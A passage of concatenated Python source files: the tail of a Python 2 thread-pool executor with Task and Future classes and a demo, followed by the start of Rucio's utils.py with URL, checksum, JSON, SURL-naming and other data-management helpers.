self.__cancelled = True
class Executor(object):
"""
Simple thread-pool based executor.
"""
class WrappedThread(threading.Thread):
"""
Threads for Executor
"""
def __init__(self, parent):
threading.Thread.__init__(self)
self.__parent = parent
self.__taskQueue = Queue.Queue()
self.__exitLoop = False
def addTask(self, task):
"""
Adds a task into this thread.
@param task: a task
"""
self.__taskQueue.put(task, True)
def terminate(self): # no way to forcibly abort..?
"""
Sets termination flag to True
"""
self.__exitLoop = True
def run(self):
if THREAD_SIGNAL_TRACE_ENABLED:
sys.settrace(lambda frame, event, arg: None)
while not self.__exitLoop:
try:
currentTask = self.__taskQueue.get(True, timeout = WORKER_THREAD_LIFETIME)
self.currentTask = None
# print "(EXECUTE %s, %s)" % (currentTask.args, id(self))
currentTask()
except ExecutorThreadInterrupt:
# Thread is interrupted
break
except _UNUSED_QUEUE_EMPTY:
# Cannot obtain next task
break
except:
# unhandled exception
if callable(self.__parent.unhandledExceptionHandler):
self.__parent.unhandledExceptionHandler(self, currentTask)
self.__parent._detachThread(self)
# print "(UNASSOCIATE Thread %s)" % id(self)
self.__parent._purgeThread(self)
def _interrupt(self, executorThreadInterruptInstance = ExecutorThreadInterrupt()):
if not isinstance(executorThreadInterruptInstance, ExecutorThreadInterrupt):
raise ValueError("%s is not an instance of %s" % (executorThreadInterruptInstance, ExecutorThreadInterrupt))
def raiseInterruptor():
raise executorThreadInterruptInstance
targetFrame = None
for threadId, frame in sys._current_frames().viewitems():
if threadId == self.ident:
targetFrame = frame
break
else:
raise ValueError("Cannot identify self thread frame: %d" % self.ident)
while targetFrame:
if targetFrame.f_trace is None:
targetFrame.f_trace = raiseInterruptor
targetFrame = targetFrame.f_back
del targetFrame
def __init__(self, daemonize = True, poolMaxSize = None, unhandledExceptionHandler = None, taskType = None):
"""
Initializer
@param daemonize: all threads are daemon thread if True
@param poolMaxSize: maximum number of threads are spawn if the argument is natural(more than 1 integral) number, or number of demand threads are spawn if None
@param unhandledExceptionHandler: a function which is invoked at a unhandled exception has occurred(forms like (lambda worker_thread, task: ..)), or exception are ignored if None
@param taskType: subtype of Task which is used for creation of new Task
"""
if not poolMaxSize is None and int(poolMaxSize) <= 0:
raise ValueError("Pool max size must be more than 0")
self.__pool = set()
self.__poolCondition = threading.Condition()
self.__submitted = Queue.Queue()
# self.__namedSubmitted = {}
self.__daemonize = daemonize
self.__creationTime = 0
self.__maxSize = int(poolMaxSize) if not poolMaxSize is None else None
self.unhandledExceptionHandler = unhandledExceptionHandler
self.taskType = taskType if isinstance(taskType, Task) else Task
self.__worker = threading.Thread(target = self.__acception)
self.__worker.daemon = True
with self.__poolCondition:
self.__worker.start()
def _detachThread(self, wrappedThread):
"""
(internal) Adds thread into thread pool
"""
with self.__poolCondition:
self.__pool.add(wrappedThread)
self.__poolCondition.notifyAll()
def _purgeThread(self, wrappedThread):
"""
(internal) Purges thread from thread pool
"""
with self.__poolCondition:
self.__pool.remove(wrappedThread)
self.__poolCondition.notifyAll()
self.__creationTime -= 1
def _takeThread(self):
"""
(internal) Takes next available thread from thread pool, or creates new thread if no threads in the thread pool and the pool has space
"""
with self.__poolCondition:
if self.__pool:
return self.__pool.pop()
if self.__maxSize is None or self.__creationTime < self.__maxSize:
t = self.WrappedThread(self)
t.start()
self.__creationTime += 1
return t
else:
# wait for free thread
while len(self.__pool) == 0:
self.__poolCondition.wait()
return self.__pool.pop()
@property
def daemonize(self):
"""
True if threads in thread pool are daemonized
"""
return self.__daemonize
def submit(self, someCallable, *args, **kwds):
"""
Submits a new task into the Executor
@param someCallable: callable object to be wrapped into Task object or subtype of self.taskType object
@param args: positional arguments for the callable object
@param kwds: keyword arguments for the callable object
@return: new Future object
"""
# print "(SUBMITTED %s)" % args
task = self.taskType(someCallable, *args, **kwds) if not isinstance(someCallable, self.taskType) else someCallable
future = Future(task)
task._setFuture(future)
self.__submitted.put(task)
return future
def __acception(self):
"""
(internal private) Takes available threads and throw next task into the threads
"""
while True:
last = self.__submitted.get()
t = self._takeThread()
# print "(Accepted %s, thread=%s)" % (last.args, id(t))
t.addTask(last)
self.__submitted.task_done()
class Task(object):
"""
Represents a "Task".
Task object is null-ary callable object and if and only if results are filled when is invoked.
Results can be obtain by "getSafe" and "get" method when "isDone" method returns True(i.e "getSafe" and "get" can raise TaskError if task is incomplete).
"getSafe" is exception free and this method returns a pair of (task result, exc_info).
"get" returns if and only if 2nd value of the return value of "getSafe" is NOT None, or raises exception(2nd value) if the 2nd value IS None.
All methods are thread-safety.
"""
def __init__(self, taskBody, *args, **kwds):
"""
Initializer
@param taskBody: task body function
@param args: positional arguments of the taskBody
@param kwds: keyword arguments of the taskBody
@raise ValueError: the taskBody is not callable
"""
if not callable(taskBody):
raise ValueError("%s is not callable" % taskBody)
self.function = taskBody
self.args = args
self.kwds = kwds
self.__resultPair = None
self.__future = None
self.__then = None
self.__completeCondition = threading.Condition()
def isDone(self):
"""
Returns True if the task is completed.
"""
with self.__completeCondition:
return not self.__resultPair is None
def await(self, timeout = None):
"""
Awaits by threads.Condition.wait method while the task is incomplete.
@param timeout: a timeout value in seconds.
@see threads.Condition.wait
"""
with self.__completeCondition:
while self.__resultPair is None:
self.__completeCondition.wait(timeout)
def cancel(self, cancellationType = ExecutorThreadInterrupt()):
t = threading.currentThread()
if not hasattr(t, "_interrupt"):
raise ValueError("Cannot interrupt")
t._interrupt(cancellationType)
def getSafe(self):
"""
Returns task results in the form of a pair of (task result, exc_info)
@return: a pair of (task result, exc_info)
"""
with self.__completeCondition:
if self.__resultPair is None:
#raise TaskError("%s is not done" % self)
return self.__call__()
return self.__resultPair
def get(self):
"""
Returns task results or raises exception.
@return: a results of the task
@raise: exception if the task is done with unhandled exception
"""
resultPair = self.getSafe()
if not resultPair[1] is None:
raise resultPair[1][0], resultPair[1][1], resultPair[1][2]
else:
return resultPair[0]
def then(self, thenBody, *args, **kwds):
"""
Appends then-clause into this task.
The then-clause is performed after task body and chain of then-clause in series if no exception raises.
Last then-clause results are introduced as task results.
@param thenBody: then-clause body function(forms like lambda lastResult, *args, **kwds: ..)
@param args: positional arguments of thenBody
@param kwds: keyword arguments of thenBody
@return: this Task object
"""
with self.__completeCondition:
if self.__resultPair:
raise TaskError("Task is already done")
thenParam = (thenBody, args, kwds)
if self.__then is None:
self.__then = [thenParam]
else:
self.__then.append(thenParam)
return self
def _setFuture(self, strongRefFuture):
"""
(internal) sets associated Future object by weakref
"""
self.__future = weakref.ref(strongRefFuture)
def __call__(self):
"""
Perform tasks and returns results in the form of like "getSafe" method.
The task is performed if and only if first time invocation.
@return: a pair of (task result, exc_info)
"""
with self.__completeCondition:
if not self.__resultPair is None:
return self.__resultPair
try:
partialResult = self.function(*self.args, **self.kwds)
if not self.__then is None:
for thenParam in self.__then:
partialResult = thenParam[0](partialResult, *thenParam[1], **thenParam[2])
self.__resultPair = (partialResult, None)
except:
excInfo = sys.exc_info()
if ERASE_UNHANDLED_TASK_EXCEPTION_FRAME_LOCALS:
currentExcInfo = excInfo.tb_next # top frame is here, 2nd frame is function body
while currentExcInfo:
frame = currentExcInfo.tb_frame
frame.f_locals.clear()
currentExcInfo = currentExcInfo.tb_next
self.__resultPair = (None, excInfo)
sys.exc_clear()
self.__completeCondition.notifyAll()
maybeRef = self.__future() if not self.__future is None else None
if maybeRef:
maybeRef._markCompleted()
return self.__resultPair
class CancellableTask(Task):
"""
This Task class is an basic concept which can be cancelled by CancellationTokenSource.
"""
def __init__(self, func, cancellationTokenSource = None, *args, **kwds):
"""
Initialize
@param func: task body function
@param cancellationTokenSource: a hook for cancellation
"""
super(CancellableTask, self).__init__(func, *args, **kwds)
self.cancellationTokenSource = cancellationTokenSource if isinstance(cancellationTokenSource, CancellationTokenSource) else CancellationTokenSource()
def cancel(self):
"""
Cancel task by corresponding CancellationTokenSource
"""
self.cancellationTokenSource.cancel()
class StepwiseTask(CancellableTask):
"""
Task which executes continuously a generator while the generator returns True-like value.
"""
def __init__(self, annotatee, cancellationTokenSource = None, *args, **kwds):
"""
Initialize
@param annotatee: a generator function. The function is executed continuously if the generator returns True-like value.
@param cancellationTokenSource: a hook for cancellation
"""
super(StepwiseTask, self).__init__(annotatee, cancellationTokenSource, *args, **kwds)
self.then(self.__stepwise__)
def __stepwise__(self, gen):
for elm in gen:
if not elm or self.cancellationTokenSource.isCancelled:
return
class Future(object):
"""
Represents Future pattern.
Future is a results of corresponding task in this context.
"""
def __init__(self, task):
"""
Initializer
@param task: Task object which to be performed in the future
"""
self.__task = task
self.__completed = False
self.__completedCondition = threading.Condition()
def _markCompleted(self):
"""
(internal) Marks this future object is decided
"""
with self.__completedCondition:
self.__completed = True
self.__completedCondition.notifyAll()
@property
def task(self):
"""
Associated Task object
"""
return self.__task
@property
def completed(self):
"""
Whether this future object is decided
"""
with self.__completedCondition:
return self.__completed
def cancel(self, timeoutForCancel = None, cancellationType = ExecutorThreadInterrupt()):
# TODO
self.__task.cancel(cancellationType)
if not timeoutForCancel is None:
with self.__completedCondition:
while not self.__completed:
self.__completedCondition.wait(timeoutForCancel)
def getSafe(self, timeout = None):
"""
Returns associated Task object's results.
This method may be blocking while the Task object is performed.
@param timeout: timeout in seconds
@return: the results of the associated Task object
@see: threading.Condition.wait
@see: Task.getSafe
"""
with self.__completedCondition:
while not self.__completed:
self.__completedCondition.wait(timeout)
return self.__task.getSafe()
def get(self, timeout = None):
"""
Return associated Task object's results, or raises exception if the Task object is done in anomaly.
This method may be blocking while the Task object is performed.
@param timeout: timeout in seconds
@return: the results of the associated Task object
@raise: exception if the task is done with unhandled exception
@see: threading.Condition.wait
"""
result, exc_info = self.getSafe(timeout)
if exc_info:
raise exc_info[0], exc_info[1], exc_info[2]
else:
return result
def __call__(self, timeout = None):
return self.get(timeout)
if __name__ == "__main__":
ex = Executor(True, 10)
def heavyTask(taskId):
n = random.randint(10, 1000)
print "(TASK %2d await %s msec)" % (taskId, n)
time.sleep(n / 1000.0)
print "(TASK %2d exit)" % taskId
return taskId
futures = [ex.submit(heavyTask, i) for i in xrange(20)]
terms = []
for f in futures:
terms.append(f.get())
print terms
print "TERMINATED, waiting"
time.sleep(WORKER_THREAD_LIFETIME + 1)
print "May all worker threads are dead"
def fooTask(a, b):
a = float(a)
b = float(b)
c = a / b
print "%f/%f = %f" % (a, b, c)
return c
t = Task(fooTask, 3, 2).then(fooTask, 2).then(fooTask, 1).then(fooTask, 0)
print t.getSafe()
def yieldFunc():
for x in xrange(10):
print "x=%d" % x
yield True
print "end"
f = ex.submit(StepwiseTask(yieldFunc))
print f()
def infTask():
c = threading.Condition()
with c:
print "Awaiting"
c.wait()
f = ex.submit(infTask)
print f.get(0.5)
f.cancel()
print f.get()
|
utils.py
|
# Copyright 2012-2019 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2019
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2017
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquin Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2018
# - Frank Berghaus, <frank.berghaus@cern.ch>, 2017
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister, <andrew.lister@stfc.ac.uk>, 2019
#
# PY3K COMPATIBLE
from __future__ import print_function
import base64
import datetime
import errno
import hashlib
import imp
import json
import os
import pwd
import re
import requests
import socket
import subprocess
import threading
import time
import zlib
from getpass import getuser
from logging import getLogger, Formatter
from logging.handlers import RotatingFileHandler
from uuid import uuid4 as uuid
from six import string_types
from xml.etree import ElementTree
try:
# Python 2
from itertools import izip_longest
except ImportError:
# Python 3
from itertools import zip_longest as izip_longest
try:
# Python 2
from urllib import urlencode, quote
except ImportError:
# Python 3
from urllib.parse import urlencode, quote
try:
# Python 2
from StringIO import StringIO
except ImportError:
# Python 3
from io import StringIO
try:
# Python 2
import urlparse
except ImportError:
# Python 3
import urllib.parse as urlparse
from rucio.common.config import config_get
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError
from rucio.common.types import InternalAccount, InternalScope
# delay import until function to avoid circular dependancy (note here for reference)
# from rucio.core.rse import get_rse_name
# Extra modules: Only imported if available
EXTRA_MODULES = {'web': False,
'paramiko': False,
'flask': False}
try:
from rucio.db.sqla.enum import EnumSymbol
EXTRA_MODULES['rucio.db.sqla.enum'] = True
except ImportError:
EXTRA_MODULES['rucio.db.sqla.enum'] = False
for extra_module in EXTRA_MODULES:
try:
imp.find_module(extra_module)
EXTRA_MODULES[extra_module] = True
except ImportError:
EXTRA_MODULES[extra_module] = False
if EXTRA_MODULES['web']:
from web import HTTPError
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
if EXTRA_MODULES['flask']:
from flask import Response
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def build_url(url, path=None, params=None, doseq=False):
"""
utitily function to build an url for requests to the rucio system.
If the optional parameter doseq is evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
complete_url += "/"
if path is not None:
complete_url += path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
def clean_headers(msg):
invalid_characters = ['\n', '\r']
for c in invalid_characters:
msg = str(msg).replace(c, ' ')
return msg
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B and concatenating their bits into a 32-bit integer. A is the sum of all bytes in the stream plus one, and B is the sum of the individual values of A from each step.
:returns: Hexified string, padded to 8 values.
"""
# adler starting value is _not_ 0
adler = 1
try:
with open(file, 'rb') as openFile:
for line in openFile:
adler = zlib.adler32(line, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler32 checksum of file %s - %s' % (file, e))
# backflip on 32bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param string: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
# should not happen since the only supported date-like format
# supported at dmain schema level is 'datetime' .
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, EnumSymbol):
return obj.description
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(l):
""" JSON render function for list
"""
return json.dumps(l, cls=APIEncoder)
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
ret_obj = None
try:
ret_obj = data.decode('utf-8')
except AttributeError:
ret_obj = data
return json.loads(ret_obj, object_hook=datetime_parser)
def generate_http_error(status_code, exc_cls, exc_msg):
"""
utitily function to generate a complete HTTP error response.
:param status_code: The HTTP status code to generate a response for.
:param exc_cls: The name of the exception class to send with the response.
:param exc_msg: The error message.
:returns: a web.py HTTP response object.
"""
status = codes[status_code]
data = {'ExceptionClass': exc_cls,
'ExceptionMessage': exc_msg}
# Truncate too long exc_msg
if len(str(exc_msg)) > 15000:
exc_msg = str(exc_msg)[:15000]
headers = {'Content-Type': 'application/octet-stream',
'ExceptionClass': exc_cls,
'ExceptionMessage': clean_headers(exc_msg)}
try:
return HTTPError(status, headers=headers, data=render_json(**data))
except Exception:
print({'Content-Type': 'application/octet-stream', 'ExceptionClass': exc_cls, 'ExceptionMessage': str(exc_msg).strip()})
raise
def generate_http_error_flask(status_code, exc_cls, exc_msg):
"""
utitily function to generate a complete HTTP error response.
:param status_code: The HTTP status code to generate a response for.
:param exc_cls: The name of the exception class to send with the response.
:param exc_msg: The error message.
:returns: a web.py HTTP response object.
"""
data = {'ExceptionClass': exc_cls,
'ExceptionMessage': exc_msg}
# Truncate too long exc_msg
if len(str(exc_msg)) > 15000:
exc_msg = str(exc_msg)[:15000]
resp = Response(response=render_json(**data), status=status_code, content_type='application/octet-stream')
resp.headers['ExceptionClass'] = exc_cls
resp.headers['ExceptionMessage'] = clean_headers(exc_msg)
try:
return resp
except Exception:
print({'Content-Type': 'application/octet-stream', 'ExceptionClass': exc_cls, 'ExceptionMessage': str(exc_msg).strip()})
raise
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out = ''
err = ''
exitcode = 0
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out, err
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(l, n):
"""
Yield successive n-sized chunks from l.
"""
for i in range(0, len(l), n):
yield l[i:i + n]
def my_key_generator(namespace, fn, **kw):
"""
Customyzed key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
def get_logger(name):
logger = getLogger(name)
hdlr = RotatingFileHandler('%s/%s.log' % (config_get('common', 'logdir'), name), maxBytes=1000000000, backupCount=10)
formatter = Formatter('%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(config_get('common', 'loglevel').upper())
return logger
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
elif nfields == 2:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], 'other', dsn, filename)
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
def construct_surl(dsn, filename, naming_convention=None):
if naming_convention == 'T0':
return construct_surl_T0(dsn, filename)
elif naming_convention == 'DQ2':
return construct_surl_DQ2(dsn, filename)
elif naming_convention == 'BelleII':
return construct_surl_BelleII(dsn, filename)
return construct_surl_DQ2(dsn, filename)
def __strip_dsn(dsn):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub('/srm/managerv1\?SFN=', '', surl)
surl = re.sub('/srm/v2/server\?SFN=', '', surl)
surl = re.sub('/srm/managerv2\?SFN=', '', surl)
res.append(surl)
res.sort()
return res
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def sizefmt(num, human=True):
"""
Print human readable file sizes
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
def get_tmp_dir():
"""
Get a path where to store temporary files.
Rucio searches a standard list of temporary directories. The list is:
The directory named by the TMP environment variable.
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
As a last resort, the /tmp/ directory.
:return: A path.
"""
user, tmp_dir = None, None
try:
user = pwd.getpwuid(os.getuid()).pw_name
except Exception:
pass
for env_var in ('TMP', 'TMPDIR', 'TEMP'):
if env_var in os.environ:
tmp_dir = os.environ[env_var]
break
if not user:
user = getuser()
if not tmp_dir:
return '/tmp/' + user + '/'
return tmp_dir + '/' + user + '/'
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = '^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
Open a UDP socket to a machine on the internet, to get the local IPv4 and IPv6
addresses of the requesting client.
Try to determine the sitename automatically from common environment variables,
in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist
use the fixed string 'ROAMING'.
"""
ip = '0.0.0.0'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
ip6 = '::'
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip6 = s.getsockname()[0]
except Exception:
pass
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
return {'ip': ip,
'ip6': ip6,
'fqdn': socket.getfqdn(),
'site': site}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
return base64.b64encode(signature_stream.get_remainder())
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
:param trace_endpoint: the endpoint where the trace should be send
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse.urlparse(url))
mod_query = dict(urlparse.parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlparse.urlunparse(url_parts)
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
:param input_string: String containing a value and an unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
try:
value = int(value)
filters[key] = value
except ValueError:
